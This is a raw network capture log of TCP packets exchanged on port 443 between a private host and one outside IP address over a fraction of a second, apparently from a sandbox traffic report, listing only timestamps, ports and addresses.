Sep 2, 2024 11:42:53.349241972 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349282980 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349291086 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349303007 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349335909 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349353075 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349361897 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349366903 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349397898 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349400997 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349447012 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349451065 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349458933 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349499941 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349503994 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349513054 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349566936 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349567890 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349577904 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349621058 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349632978 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349673986 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349680901 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349684954 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349729061 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349734068 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349755049 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349791050 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349797964 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349807978 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349812031 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349841118 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349853039 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349896908 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349909067 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349912882 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349944115 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.349946976 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349989891 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.349993944 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350003004 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350042105 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350044966 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350055933 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350075006 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350100994 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350110054 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350114107 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350146055 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350152969 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350167990 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350203991 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350217104 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350222111 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350228071 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350265980 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350279093 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350330114 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350333929 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350346088 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350387096 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350389957 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350402117 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350434065 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350446939 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350451946 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350455999 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350497007 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350505114 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350553989 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350554943 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350565910 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350615978 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350616932 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350670099 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.350673914 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.350716114 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431072950 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431127071 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431128025 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431137085 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431176901 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431179047 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431186914 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431212902 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431229115 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431276083 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431282043 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431330919 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431370020 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431418896 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431425095 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431427956 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431464911 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431534052 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431581974 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431587934 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431643009 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431648016 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431653023 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431687117 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431750059 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431799889 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431806087 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431817055 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431854963 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431859016 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431881905 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431916952 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.431965113 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.431967974 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432008982 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432043076 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432095051 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432096958 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432105064 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432148933 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432148933 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432158947 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432199001 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432199955 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432209015 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432251930 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432260036 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432264090 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432288885 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432370901 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432410955 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432414055 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432457924 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432496071 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432499886 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432509899 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432518959 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432569027 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432575941 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432607889 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432637930 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432641983 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432650089 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432679892 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432733059 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432737112 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432781935 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432786942 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432792902 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432833910 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432842016 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432845116 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432873964 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432874918 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432893038 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432895899 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.432925940 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.432954073 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.433007002 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.433011055 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.433063984 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.433871031 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.433927059 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.433948994 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.433953047 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.433975935 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.433990955 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.434045076 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.434094906 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.434098005 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.434107065 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.434138060 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.434145927 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.434194088 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.434195042 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.434204102 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.434237003 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.515748024 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.515811920 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.515841961 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.515849113 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.515858889 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.515877962 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.515896082 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.515898943 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.515908003 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.515924931 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.515954018 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.515958071 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.515965939 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516007900 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516011953 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516060114 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516060114 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516084909 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516098976 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516112089 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516153097 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516156912 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516164064 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516206026 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516211033 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516236067 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516261101 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516263962 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516282082 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516295910 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516341925 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516345024 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516352892 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516392946 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516395092 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516406059 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516453028 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516453981 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516463995 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516500950 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516522884 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516568899 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516572952 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516619921 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516649961 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516699076 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516705036 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516707897 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516742945 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516758919 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516805887 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516834021 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.516885042 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.516982079 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.517026901 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.517029047 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.517036915 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.517069101 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.517074108 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.517087936 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.517091036 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.517115116 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.517209053 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.517246008 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.517250061 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.517256021 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.517293930 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.517313957 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.517363071 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.518258095 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.518297911 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.518315077 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.518318892 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.518359900 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.518378973 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.518428087 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.518435001 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.518438101 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.518476009 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.518479109 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.518501043 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.518503904 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.518528938 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.518529892 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.518583059 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.518588066 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.518635988 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.600001097 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600074053 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.600127935 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600179911 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600234032 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600245953 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.600254059 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600276947 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600281000 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.600303888 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.600307941 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600328922 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.600343943 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600395918 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.600400925 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600441933 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.600447893 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600502014 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.600653887 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600694895 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600703955 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.600708008 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600749016 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600752115 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.600759983 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600802898 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.600826979 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.600876093 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601012945 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601058006 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601067066 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601069927 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601103067 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601195097 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601234913 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601249933 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601253033 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601275921 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601361036 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601402044 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601406097 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601424932 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601455927 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601459026 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601469040 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601485014 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601514101 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601517916 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601528883 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601563931 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601572037 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601618052 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601623058 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601634026 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601674080 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601676941 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601684093 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601716042 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601725101 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601725101 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601736069 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601775885 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601777077 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601784945 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601857901 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601880074 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.601886034 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.601922989 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.602334023 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.602377892 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.602381945 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.602425098 CEST	49763	443	192.168.2.4	191.96.144.157
